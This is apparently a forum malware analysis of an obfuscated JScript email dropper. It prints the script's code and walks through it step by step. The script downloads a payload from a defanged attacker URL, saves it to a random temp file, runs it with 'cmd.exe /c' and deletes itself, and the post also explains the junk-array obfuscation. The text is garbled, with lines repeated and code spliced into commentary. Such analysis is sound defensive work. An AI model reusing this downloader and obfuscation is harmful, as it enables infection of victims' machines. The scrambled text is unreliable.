=> Example : rad44325.tmp
=> C:\Users\DardiM\AppData\Local\Temp\rad44325.tmp+ FileObjectSystem["GetTempName"]
GetSpecialFolder"](2)
=> %TEMP%
=> Example : C:\Users\DardiM\AppData\Local\Temp\
GetTempName :
=> get a random .tmp file name
=> Example : rad44325.tmp
(with the error : C:\Users\DardiM\AppData\Local\Temprad44325.tmp)
This time, good folder and good random payload name used, they have not forgotten "\\\\" :
%TEMP% + "\\\\" + Randomname.tmp
why four "\" ?!
The backslash is used as a marker character to tell the compiler/interpreter that the next character has some special meaning
\ is used as an information, so the first \ allows to tell to the interpreter that the second \ is a char
"\\" => mean : use "\"
then "\\\\" => mean use "\\"
at the concatenation "\\\\" => "\\"
And at the use of the whole string :
C:\\Users\\DardiM\\AppData\\Local\\Temp\\rad44325.tmp
=> C:\Users\DardiM\AppData\Local\Temp\rad44325.tmp
The backslash is used as a marker character to tell the compiler/interpreter that the next character has some special meaning
\ is used as an information, so the first \ allows to tell to the interpreter that the second \ is a char
"\\" => mean : use "\"
then "\\\\" => mean use "\\"
at the concatenation "\\\\" => "\\"
And at the use of the whole string :
C:\\Users\\DardiM\\AppData\\Local\\Temp\\rad44325.tmp
=> C:\Users\DardiM\AppData\Local\Temp\rad44325.tmp
2-4) The case part :case true:
var hvaqxena = new Function(ileslyxy5)();
var ulosucith = [5, 1, 3, 1, 8, [4, 9, 3, 1, 3, 5, "o", 7, 1], 6, 9]["5"];
var mkolheni2 = [3, 9, [9, 3, 6, "n", 6, 7, 9, 3, 2], 6, 8, 4, 9, 8]["2"];
var emnylpupp4 = [[8, 9, "jnu", 1, 3, 3, 5, 1, 7], 7, 6, 8, 2, 8, 7, 2]["0"];
var geqjyxytp7 = [2, 1, 7, 4, 2, [4, "id", 4, 5, 1, 8, 1, 1], 2, 7, 7]["5"];
var abuqxyhe5 = [7, 7, 7, 1, 1, 9, 1, [7, 5, 3, 6, 2, 6, 6, "jj"]]["7"];
var evgoxhogqo7 = [3, 7, 8, 4, 1, 1, 5, 6, 5, [1, 3, 3, 2, 6, 4, 9, 5, "ep", 9]]["9"];
var jegewyxde = [7, 7, 9, 1, [7, 6, 3, 6, 8, "i", 9, 2, 7], 4, 7, 6, 7]["4"];
var himbatad = [8, 1, 4, 4, 5, 6, 2, 6, 5, [7, "o", 2, 8, 2, 5, 2, 3, 6]]["9"];
var omulpybl5 = [[2, 2, 3, 5, 5, 8, "u", 1, 9], 1, 6, 1, 8, 2, 8, 9]["0"];
var sqyvalapy0 = [[5, 8, 7, 6, 9, 4, 7, 4, 1, "i"], 4, 8, 9, 9, 6, 7, 6, 6, 1]["0"];
var ohucrilc3 = [3, 6, 4, [6, 5, 4, 6, 8, 3, 6, "z", 1, 7], 1, 4, 9, 6, 8]["3"];
var ytelrurm8 = [9, 4, 4, 7, 3, 1, 8, [6, 1, 5, 7, 4, 2, 3, 5, "am", 8]]["7"];
var eziwyqfox3 = [3, 4, 6, 1, 2, 7, 7, 5, [7, 8, 1, 6, 3, 8, 8, "xa", 9, 4], 6]["8"];
var tapkemifwo7 = [8, 6, 6, [5, 2, "yh", 8, 7, 1, 7, 3], 2, 1, 8, 1]["3"];
var rhawuxpullu = [5, 6, 3, 5, 2, 3, 7, 8, 4, [4, 9, 5, 9, 3, 7, "bno", 2, 8, 2]]["9"];
break;
}
Only one part is useful :
var hvaqxena = new Function(ileslyxy5)();
The other parts are the famous useless arrays stuff (see previous part 2-1) ) only put to obfuscate a bit more the script
(remember we have seen var hvaqxena : "return ActiveXObject;");
3) Main part - deobuscated :
var owdeqg2 = yvyndax;
=> Stream.Type = 1
=> The data received will be consider as binary data (not text) when put on the Stream
if (abogikn[qusuhyxi + ynabovx4] == 200) {
jrasujw[ifcedyka9 + exolcyky + igoptujmyk + bigpefco](ecystogo);
=> "ADODB.Stream"
var ekwidedul = new hvaqxena(owdeqg2);
=> var ekwidedul = new ActiveXObject("ADODB.Stream");
=> create the Stream object that will be used to save the data received by the request
ekwidedul[urtiwguqja + hgudipcu]();=> create the Stream object that will be used to save the data received by the request
=> Stream["Open"]
=> Open the Stream : to be able to use it
var qupqykmy = ijigsokhimw3;=> Open the Stream : to be able to use it
=> URL used : "http ://www .contrivedzh.top/admin.php?f=2.dat"
ekwidedul[lgimonra3 + lgufjaregzi + otvebolhyn] = 0;
=> Stream["Position"] = 0
=> prepare the position where to write the data
var gmavabava8 = derfycgy;=> prepare the position where to write the data
=> "WScript.Shell"
=> will be used to create an ActiveX object Shell
var ecystogo = imis9[fdukezyh8 + tkymrawcy + jajyhyxwy + afehjate1 + wexuflu];=> will be used to create an ActiveX object Shell
=> var ecystogo = WScript["ScriptFullName"]
=> The script full name
=> Example : "J:\\ANALISE\\21_11_2016\\EMAIL_25793.js"
var exet3 = new hvaqxena(gmavabava8);=> The script full name
=> Example : "J:\\ANALISE\\21_11_2016\\EMAIL_25793.js"
=> var exet3 = new ActiveXObject( "WScript.Shell")
=> Shell object, will be use to run the payload (see above parts)
var qrujcydvipd9 = axduxynat;=> Shell object, will be use to run the payload (see above parts)
=> "MSXML2.XMLHTTP"
=> the string that will be used to create the HTTP object
var gvidummulj7 = epcemescip;=> the string that will be used to create the HTTP object
=> "Scripting.FileSystemObject"
=> var gvidummulj7 = epcemescip;
=> var gvidummulj7 = epcemescip;
=> var epcemescip = [9, 3, 7, 9, texlopkak1 + tonumejt + tigviqzave7 + soxispi + fhadisuhy + iwebog + bacodta2 + slyplumxop8 + mixemrid4, 7, 8, 5, 2]["4"];
=> texlopkak1 + tonumejt + tigviqzave7 + soxispi + fhadisuhy + iwebog + bacodta2 + slyplumxop8 + mixemrid4
=> "Scripting.FileSystemObject"
var jrasujw = new hvaqxena(gvidummulj7);
=> new ActiveXObject( "Scripting.FileSystemObject")
=> the object used to manipulate files / folders
var abogikn = new hvaqxena(qrujcydvipd9);=> the object used to manipulate files / folders
=> new ActiveXObject( "MSXML2.XMLHTTP")
=> create the http object, to make the request
var czeqip = jrasujw[rtyrcomozsa8 + quludvi1 + jzucpekkage + lagyvgeq4 + hhitwycyxd0 + uvmewasca](2) + zgafgado + jrasujw[zcexsaqekg + tfufubres0 + gibdymco0 + ruxrabu]();=> create the http object, to make the request
=> Path :
=> Example : => C:\Users\DardiM\AppData\Local\Temp\rad44325.tmp
abogikn[odojkycxyzd](yzozyvy, qupqykmy, 0);=> Example : => C:\Users\DardiM\AppData\Local\Temp\rad44325.tmp
var czeqip = FileObjectSystem["Get" + "Spe" + "cia" + "lFo" + "lde" + "r"](2) + "\\\\"
+ FileObjectSystem["Get" + "Tem" + "pNa" + "me"]
+ FileObjectSystem["Get" + "Tem" + "pNa" + "me"]
=> var czeqip = FileObjectSystem["GetSpecialFolder"](2) + "\\\\"
+ FileObjectSystem["GetTempName"]
GetSpecialFolder"](2)
=> %TEMP%
=> Example : C:\Users\DardiM\AppData\Local\Temp\
GetTempName :
=> Example : rad44325.tmp
=> C:\Users\DardiM\AppData\Local\Temp\rad44325.tmp+ FileObjectSystem["GetTempName"]
GetSpecialFolder"](2)
=> %TEMP%
=> Example : C:\Users\DardiM\AppData\Local\Temp\
GetTempName :
=> Example : rad44325.tmp
=> var odojkycxyzd = [4, 1, 4, 4, 7, 2, 8, 'open', 4, 1]["7"];
=> "open"
=> Stream[open"]("GET", URL,0)
=> Open a connection on the URL
abogikn[pdimuly]();=> "open"
=> Stream[open"]("GET", URL,0)
=> Open a connection on the URL
=> var pdimuly = [6, 1, "send", 5, 4, 7, 8, 4]["2"];
=> "send"
=> http["send"]()
=> http.send()
=> Make the http request
ekwidedul[osabaq + zudxoba8] = 1;=> "send"
=> http["send"]()
=> http.send()
=> Make the http request
=> Stream.Type = 1
=> The data received will be consider as binary data (not text) when put on the Stream
=> http.Status == 200 ?
=> test if the request was successfully made
ekwidedul[snumsisike + hnegfepsuta3](abogikn[yksazbasfo8 + odomebef + zevibnib + jenhadno1]);
}=> test if the request was successfully made
ekwidedul[snumsisike + hnegfepsuta3](abogikn[yksazbasfo8 + odomebef + zevibnib + jenhadno1]);
=> Stream["Write"](http["ResponseBody"])
=> Stream.Write(http.ResponseBody)
=> Writes the data received by the request, on the Stream object.
ekwidedul[fjynhevonra1 + kzunaxve5 + obutdymi + jyryxxirnu](czeqip);=> Stream.Write(http.ResponseBody)
=> Writes the data received by the request, on the Stream object.
=> Stream["SaveTofile"](path)
=> Stream.SaveTofile(path)
=> save the data to a file, using the path
=> Example :
ekwidedul[awgykpomoj1 + hdocirzy1]();=> Stream.SaveTofile(path)
=> save the data to a file, using the path
=> Example :
=> C:\Users\DardiM\AppData\Local\Temp\rad44325.tmp
=> Stream["close"]()
=> Stream.close()
=> close the Stream object
var yhamgyv1 = odynfinteds + czeqip;=> Stream.close()
=> close the Stream object
=> "cmd.exe /c " + path
=> Example : "cmd.exe /c C:\Users\DardiM\AppData\Local\Temp\rad44325.tmp"
=> Example : "cmd.exe /c C:\Users\DardiM\AppData\Local\Temp\rad44325.tmp"
exet3[vwafgehni0](yhamgyv1, 0);=> Shell["run"](commandLine ,0)
jrasujw[ifcedyka9 + exolcyky + igoptujmyk + bigpefco](ecystogo);
=> I have explained on part 2-3) how to deobfuscate this part
=> FileObjectSystem["deleteFile"](WScript.ScriptFullName)
=> delete the current running script
=> FileObjectSystem["deleteFile"](WScript.ScriptFullName)
=> delete the current running script
4) Conclusion :
Some parts has been improved in these new versions.
3 Types of array used, with one of them completely useless for the malware part (data not used as "puzzle parts", but to obfuscate a bit more the script).
Now, the useful value is not the last value, but need the index clue to be found
The error with folder / name to be used has been solved.
The script is deleting itself a the end.
URL :
3 Types of array used, with one of them completely useless for the malware part (data not used as "puzzle parts", but to obfuscate a bit more the script).
Now, the useful value is not the last value, but need the index clue to be found
The error with folder / name to be used has been solved.
The script is deleting itself a the end.
URL :
http ://www .contrivedzh.top/admin.php?f=2.dat
Payload :
Example : C:\Users\DardiM\AppData\Local\Temp\rad44325.tmp
Random name :
Antivirus scan for 413830976864196c4ed5312af9888cf15a541ec0626e6101e2e2bb75276d187a at 2016-11-21 15:56:32 UTC - VirusTotal
https://www.hybrid-analysis.com/sam...ec0626e6101e2e2bb75276d187a?environmentId=100
Random name :
=> rad : means "random"
=> + 5 HEX values (0 => 9 and A => F)
3 / 56=> + 5 HEX values (0 => 9 and A => F)
Antivirus scan for 413830976864196c4ed5312af9888cf15a541ec0626e6101e2e2bb75276d187a at 2016-11-21 15:56:32 UTC - VirusTotal
https://www.hybrid-analysis.com/sam...ec0626e6101e2e2bb75276d187a?environmentId=100
Last edited:
